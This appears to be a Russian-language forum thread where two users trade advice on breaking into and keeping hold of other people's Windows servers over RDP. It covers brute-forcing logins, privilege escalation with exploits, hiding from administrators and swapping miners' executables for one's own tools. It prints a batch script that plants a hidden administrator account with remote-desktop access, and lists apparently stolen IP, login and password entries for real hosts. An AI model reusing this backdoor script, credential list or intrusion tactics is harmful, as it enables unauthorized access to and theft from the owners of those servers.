вопросы о дедиках (помогите)

[Azaar]

Ребят помогите в вопросах
1) как можно повысить права юзера до админа на дедике? Windows от 7 до 10
2) на дедике на запускается exe файл ,просит права админа, можно обойти?
3) как создать скрытый процесс, чтобы не отображался в трее
4)нет интернет соединения на дедике, можно ли включить? (я ведь через инет к нему подключился)

 

[alert]

Ребят помогите в вопросах
1) как можно повысить права юзера до админа на дедике? Windows от 7 до 10
2) на дедике на запускается exe файл ,просит права админа, можно обойти?
3) как создать скрытый процесс, чтобы не отображался в трее
4)нет интернет соединения на дедике, можно ли включить? (я ведь через инет к нему подключился)

1) юзать сплоиты
2) юзать сплоит, если надо что то установить качай portable версию
3) юзать сплоит 😀 софт был когда то по этой хуйне но кодер его забросил так как не кто не юзал
4) браузер поменяй через iexplorer.exe врятли подключишься

 

[Azaar]

2) юзать сплоит, если надо что то установить качай portable версию

можно по подробней о portable

 

[Azaar]

еще такой вопрос
на дедике установлен TeamViewer , можно его удалить? если я его удалю, он только на моей учетки удалится? не запалят?
и еще не могу установить почему то winpcap на windows server 2008 r2, хотя есть права админа, 7zip тоже не устанавливался, поменял путь установки(на рабочий стол) установился. а вот winpcap путь для установки не просит.

Посмотреть вложение 6894

 

[alert]

можно по подробней о portable

Установленный софт к примеру winrar portable чтобы не устанавливать, а сразу юзать.

еще такой вопрос
на дедике установлен TeamViewer , можно его удалить? если я его удалю, он только на моей учетки удалится? не запалят?
и еще не могу установить почему то winpcap на windows server 2008 r2, хотя есть права админа, 7zip тоже не устанавливался, поменял путь установки(на рабочий стол) установился. а вот winpcap путь для установки не просит.

Посмотреть вложение 6894

Удалять что то от админа не стоит если админ заметит что какой то софт у него пропадает то он начнет либо проверку антивирусом или сам будет узнавать че за дела и куда делся софт, в лучшем случае админ установит софт заново.

По установке доступ к дискам закрыт скорее всего и доступ только к чтению.

 

[Azaar]

[USERS=alert] на одном дедике нашел эти файла, на сколько я понимаю один батник чистит логи, второй тоже что то похожее, а третий cmd он вроде повышает права если я не ошибаюсь, посмотри пожалуйста что это? может чтото полезное
https://yadi.sk/i/5cPavZkD3Sx6RC
https://yadi.sk/i/2qX17xiD3Sx6TW
https://yadi.sk/i/H09CQ3vG3Sx6UB[/USERS]

 

[alert]

[USERS=Azaar]
Первый чистит полостью автозагрузку в реестре, от локеров батник сделали.
Второй чистит eventlog с таймаутом в 60 секунд.
Третий это продолжение первого батника, чистит автозагрузку восстанавливает обновления флеш плеера, хрома, винды, чистит диспетчер задач и удаляет файлы из разных директорий короче файл нацелен убивать майнеры на дедиках.
[/USERS]
Код красиво написан я лично бы убрал половину кода 😀
Видимо какой то щепетильный если даже echo юзается

 

[Azaar]

@alert, ясно, спасибо! значит не зря выдернул, пригодится, ато очень много майнеров на дедиках которые мешают работать, проц на 90% грузят. можно и насвоем ПК запустить значить)) почистить, на всяк случай.
[USERS=alert] интересный способ придумал добычи дедиков, по всем раздачам пробежался, даже за 2016 год, деды собрал, около 500 шт, через чекер прогнал, штук 30 рабочих оказались, на половина локеры стояли, но какие смог снял, свои поставил)) но почти на всех антивирусы и нет прав на запуск exe файла, а я хочу Forcer на все поставить чтобы норм дедики сбрутить[/USERS]

 

[alert]

@alert, ясно, спасибо! значит не зря выдернул, пригодится, ато очень много майнеров на дедиках которые мешают работать, проц на 90% грузят. можно и насвоем ПК запустить значить)) почистить, на всяк случай.

Да у меня свой похожий есть который когда то писал но приходиться переделывать под разные локеры 😳
[LIKES=1]А вот с майнерами можно подменять .exe файл на любой другой или на запуск твоего брута 😀[/LIKES]
По поводу способа
[USERS=Azaar]
Да я вкурсе я тоже так давно делаю только грабберы юзаю чтобы охват был больше. С локерами на многих проблемы и убрать сложно метасплоит загрузить не успеваешь, а если антивирус стоит то дедик можно использовать под скан на kportscan к примеру антивирусы не ругаются. [/USERS]

 

[Azaar]

[LIKES=1]интересная задумка, майненгом не занимаюсь, а вот на брут подменить хорошо бы было, а ты не в курсе как это сделать? просто заменить название и закинуть в ту же директорию или танцы с бубном?[/LIKES]

 

[Azaar]

Друзья у кого есть нормальный Forcer ? поделитеся, у меня он кривой какой-то попался
Посмотреть вложение 6911
детектор не создает криптованный гуд. а в форцер X вроде как только криптованный нужно загружать

 

[alert]

Друзья у кого есть нормальный Forcer ? поделитеся, у меня он кривой какой-то попался
Посмотреть вложение 6911
детектор не создает криптованный гуд. а в форцер X вроде как только криптованный нужно загружать

detektorGood у тебя же есть там, загружай его в форсер и бруть или поищи другой форсер без крипты.

[USERS=Azaar]Можешь просто ярлык подменять(переименовать) на свой брут и майнер будет запускать твой файл[/USERS]

 

[Azaar]

да я что то тупанул, видяшку посмотрел на ютубе, там говорили что только криптованный файл нужно, у меня и так работает оказывается.

форцет брутит только по загруженным паролям?
я в раздаче видел много строк где логин=пароль, какая прога так брутит? подставляет в качестве пароля логин?
83.56.37.93:3389;OFICINA;OFICINA
159.180.255.59:3389;DOMINIQUE;dominique
216.155.89.133:3389@AKVAGROUP\warehouse;warehouse
190.153.171.194:3389@ACONNECTIONS\valentin;valentin
186.103.131.20:3389@MAITENAL\scanner;scanner
181.75.126.70:3392@SERVIDORTABLETS\gina;gina
190.47.226.182:3389@SRV_HP\david;david
190.82.99.94:3389@AGUASANTA\guest;guest
186.67.115.74:3389@SANJORGE1\winter;winter
190.151.9.234:3391@SERVIDOR2\christine;christine

можете посоветовать чекер который гуды чекает на страну (город) и скорость интернета?


@alert, Тему посмотрели 50+ человек, и все молчат, такое ощущение что только ты один здесь знаешь все про брут дедов, или все боятся что я их хлеб заберу))
жаль что не могу плюсануть тебе

 

[Azaar]

Ребят посмотрите пожалуйста, пользователя создает, а в группы админа и удаленного стола не добавляет. что дописать или исправить подскажите
короч этот код в батник и запускаю и все.

Echo off
set user=abmin
set pass=qwaszx

set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "=") Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /active:"yes" /expires:"never" /passwordchg:"NO"
net localgroup %AdmGroup% %user% /add
set RDPGroupSID=S-1-5-32-555
set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "=") Do set RDPGroup=%%J
set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" %user% /add
net accounts /forcelogoff:no /maxpwage:unlimited
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %user% /t REG_DWORD /d 0x0 /f

if not exist %systemdrive%\users\%user% mkdir %systemdrive%\users\%user%
attrib %systemdrive%\users\%user% +r +a +s +h

dxdiag /whql:off /t c:\systeminfo.txt
systeminfo » c:\systeminfo.txt
ipconfig » c:\systeminfo.txt

::netsh firewall add portopening TCP 3389 "Remote Desktop"
::sc config tlntsvr start=auto
::tlntadmn config port=2323 sec=-NTLM
::net start Telnet
::shutdown.exe -r -t 00 -f
::del %0

 

[alert]

Ребят посмотрите пожалуйста, пользователя создает, а в группы админа и удаленного стола не добавляет. что дописать или исправить подскажите
короч этот код в батник и запускаю и все.

Echo off
set user=abmin
set pass=qwaszx

set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "=") Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /active:"yes" /expires:"never" /passwordchg:"NO"
net localgroup %AdmGroup% %user% /add
set RDPGroupSID=S-1-5-32-555
set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "=") Do set RDPGroup=%%J
set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" %user% /add
net accounts /forcelogoff:no /maxpwage:unlimited
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %user% /t REG_DWORD /d 0x0 /f

if not exist %systemdrive%\users\%user% mkdir %systemdrive%\users\%user%
attrib %systemdrive%\users\%user% +r +a +s +h

dxdiag /whql:off /t c:\systeminfo.txt
systeminfo » c:\systeminfo.txt
ipconfig » c:\systeminfo.txt

::netsh firewall add portopening TCP 3389 "Remote Desktop"
::sc config tlntsvr start=auto
::tlntadmn config port=2323 sec=-NTLM
::net start Telnet
::shutdown.exe -r -t 00 -f
::del %0

По сути должен добавлять пользователя командой
net localgroup "%RDPGroup%" %user% /add
Можешь сам добавлять в группу через команду
[LIKES=5]lusrmgr.msc и дальше ручками[/LIKES]

да я что то тупанул, видяшку посмотрел на ютубе, там говорили что только криптованный файл нужно, у меня и так работает оказывается.

форцет брутит только по загруженным паролям?
я в раздаче видел много строк где логин=пароль, какая прога так брутит? подставляет в качестве пароля логин?
83.56.37.93:3389;OFICINA;OFICINA
159.180.255.59:3389;DOMINIQUE;dominique
216.155.89.133:3389@AKVAGROUP\warehouse;warehouse
190.153.171.194:3389@ACONNECTIONS\valentin;valentin
186.103.131.20:3389@MAITENAL\scanner;scanner
181.75.126.70:3392@SERVIDORTABLETS\gina;gina
190.47.226.182:3389@SRV_HP\david;david
190.82.99.94:3389@AGUASANTA\guest;guest
186.67.115.74:3389@SANJORGE1\winter;winter
190.151.9.234:3391@SERVIDOR2\christine;christine

можете посоветовать чекер который гуды чекает на страну (город) и скорость интернета?


@alert, Тему посмотрели 50+ человек, и все молчат, такое ощущение что только ты один здесь знаешь все про брут дедов, или все боятся что я их хлеб заберу))
жаль что не могу плюсануть тебе

Форсер использует recongizer и достает 100% учетные записи на дедике тебе только остается подобрать пароль под них.

190.47.226.182:3389@SRV_HP\david;david лог с брута ForecerX просто в список паролей добавляешь ТЕГИ.

Чекер/брут неплохой z668, но на скорость не один помоему чекер не чекает.
вот вид чека
Страна/штат/город/зип/чек блек листов
[LIKES=11]
24.155.190.75:3389;ARGYLEISD\ARGYLEISD\timeclock;timeclock | Country: United States | State: Texas | City: Flower Mound | ZIP: 75028 | ISP: Grande Communications | Ping: N/A ms. | Blacklists check: Spamhaus-> 0/4, Sorbs.net-> 0/14, Spamcop-> 0/1, South Korean-> 0/1, Barracuda-> 0/1, Over-> 0/55 |
[/LIKES]

 

[Azaar]

просто в список паролей добавляешь ТЕГИ.

Чекер/брут неплохой z668, но на скорость не один помоему чекер не чекает.

подскажи пожалуйста какие теги, я не кодер
на сколько я понимаю z668 брутит только висту и вин 2003?
я его на брут поставил, думал лучше будет, он только эти ОС набрутил

 

[alert]

подскажи пожалуйста какие теги, я не кодер
на сколько я понимаю z668 брутит только висту и вин 2003?
я его на брут поставил, думал лучше будет, он только эти ОС набрутил

[USERS=Azaar]
Добавь в словарь паролей %username%
[/USERS]
z668 точно такой же как и forcer только жрет много ресурсов и на нем можно брутить 7/8/10 и отдельно 2000 и висту

 

[Azaar]

@alert, [USERS=alert]по поводу тега, можно чтобы цыфры дописывались тоже? например логин user и чтобы пароли подставлял user1 user2 user3 и так далее
и что скажешь по поводу виртуалок на дедике? нашел пару пиздато мощьных машин, но они закриптованны. думаю виртуалку посадить и юзать.[/USERS]

 

[alert]

@alert,

[USERS=Azaar]Да в тег можешь дописывать.
На счет виртуалок на некоторых дедиках может быть в биосе отключено виртуальная поддержка и 64 к примеру не поставить, но я ставил приватку с кучей платного софта удобно было но админ потом снес увидел установленную виртуалку, вообщем можешь поставить но и можешь дедик потерять из з этого, да и многие админы не ожидают такой наглости от взломщиков.[/USERS]

 

[Azaar]

@alert, [LIKES=50] мне дедик попался с зорошей скоростью, 2терика и 8 ядер, но он сцука закриптован. после перезагрузки все к чертям криптуется. и самое интересное в том что я там один, учетка там одна, другие учетки создаю, подключается но когда ничинается загрузка ОС выдает ошибку. Я на нет неделю уже сижу и никто не выгоняет))
вот на него хочу посадить витру чтобы нормально работать и не криптовались файлы. я уже на один дед посадил вирту из за Forcerа , не хотел он запускатся, пока норм рабораю

Да еще хотел спросить как на своей учетки убрать таймаут , после определенного простоя бездействия дед выключается , может софт какой есть?

И еще вопрос, на одном дедике все учетки сломал(9шт) постоянные активы только 3 , если на все свободные учетки ForcerX посадить сервак не упадет? [/LIKES]